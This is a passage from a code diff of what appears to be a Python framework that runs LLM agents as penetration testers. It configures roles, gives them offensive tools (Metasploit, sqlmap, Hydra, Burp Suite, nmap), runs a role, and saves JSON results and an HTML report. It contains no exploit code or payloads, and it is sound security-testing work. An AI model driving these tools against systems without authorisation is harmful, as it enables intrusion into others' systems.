"burpsuite", "sqlmap", "hydra"], + "description": "Performs comprehensive penetration tests across various domains." + }, + "owasp_expert": { + "enabled": True, + "llm_profile": "gemini_pro_default", + "tools_allowed": ["burpsuite", "sqlmap"], + "description": "Specializes in assessing web applications against OWASP Top 10 vulnerabilities." + }, + "cwe_expert": { + "enabled": True, + "llm_profile": "claude_opus_default", + "tools_allowed": [], + "description": "Analyzes code and reports for weaknesses based on MITRE CWE Top 25." + }, + "malware_analyst": { + "enabled": True, + "llm_profile": "gpt_4o_default", + "tools_allowed": [], + "description": "Examines malware samples to understand functionality and identify IOCs." + } + }, + "methodologies": { + "owasp_top10": True, + "cwe_top25": True, + "network_pentest": True, + "ad_pentest": True, + "web_security": True + }, + "tools": { + "nmap": "/usr/bin/nmap", + "metasploit": "/usr/bin/msfconsole", + "burpsuite": "/usr/bin/burpsuite", + "sqlmap": "/usr/bin/sqlmap", + "hydra": "/usr/bin/hydra" + }, + "output": { + "format": "json", + "verbose": True, + "save_artifacts": True + } + } + + # Save default config + os.makedirs(os.path.dirname(self.config_path), exist_ok=True) + with open(self.config_path, 'w') as f: + json.dump(config, f, indent=4) + + logger.info(f"Created default configuration at {self.config_path}") + return config + + + + def _initialize_llm_manager(self, agent_llm_profile: Optional[str] = None): + """Initializes LLMManager with a specific profile or default.""" + llm_config = self.config.get('llm', {}) + if agent_llm_profile: + # Temporarily modify config to set the default profile for LLMManager init + original_default = llm_config.get('default_profile') + llm_config['default_profile'] = agent_llm_profile + self.llm_manager_instance = LLMManager({"llm": llm_config}) + llm_config['default_profile'] = original_default # Restore original default + else: + self.llm_manager_instance = LLMManager({"llm": llm_config}) + + def execute_agent_role(self, agent_role_name: str, user_input: str, additional_context: Optional[Dict] = None): + """Execute a specific agent role with a given input.""" + logger.info(f"Starting execution for agent role: {agent_role_name}") + + agent_roles_config = self.config.get('agent_roles', {}) + role_config = agent_roles_config.get(agent_role_name) + + if not role_config: + logger.error(f"Agent role '{agent_role_name}' not found in configuration.") + return {"error": f"Agent role '{agent_role_name}' not found."} + + if not role_config.get('enabled', False): + logger.warning(f"Agent role '{agent_role_name}' is disabled in configuration.") + return {"warning": f"Agent role '{agent_role_name}' is disabled."} + + llm_profile_name = role_config.get('llm_profile', self.config['llm']['default_profile']) + self._initialize_llm_manager(llm_profile_name) + + if not self.llm_manager_instance: + logger.error("LLM Manager could not be initialized.") + return {"error": "LLM Manager initialization failed."} + + # Get the prompts for the selected agent role + # Assuming agent_role_name directly maps to the .md filename + agent_prompts = self.llm_manager_instance.prompts.get("md_prompts", {}).get(agent_role_name) + if not agent_prompts: + logger.error(f"Prompts for agent role '{agent_role_name}' not found in MD library.") + return {"error": f"Prompts for agent role '{agent_role_name}' not found."} + + # Instantiate and execute the BaseAgent + agent_instance = BaseAgent(agent_role_name, self.config, self.llm_manager_instance, agent_prompts) + + results = agent_instance.execute(user_input, additional_context) + + # Save results + campaign_results = { + "session_id": self.session_id, + "agent_role": agent_role_name, + "input": user_input, + "timestamp": datetime.now().isoformat(), + "results": results + } + self._save_results(campaign_results) + return campaign_results + + def _save_results(self, results: Dict): + """Save campaign results""" + output_file = f"results/campaign_{self.session_id}.json" + with open(output_file, 'w') as f: + json.dump(results, f, indent=4) + logger.info(f"Results saved to {output_file}") + + # Generate report + self._generate_report(results) + + def _generate_report(self, results: Dict): + """Generate HTML report for agent role execution""" + report_file = f"reports/report_{self.session_id}.html" + + html = f""" + + +
+Agent Role: {results.get('agent_role', 'N/A')}
+Input: {results.get('input', 'N/A')}
+Session: {results['session_id']}
+Timestamp: {results['timestamp']}
+{json.dumps(results.get('results', {}), indent=2)}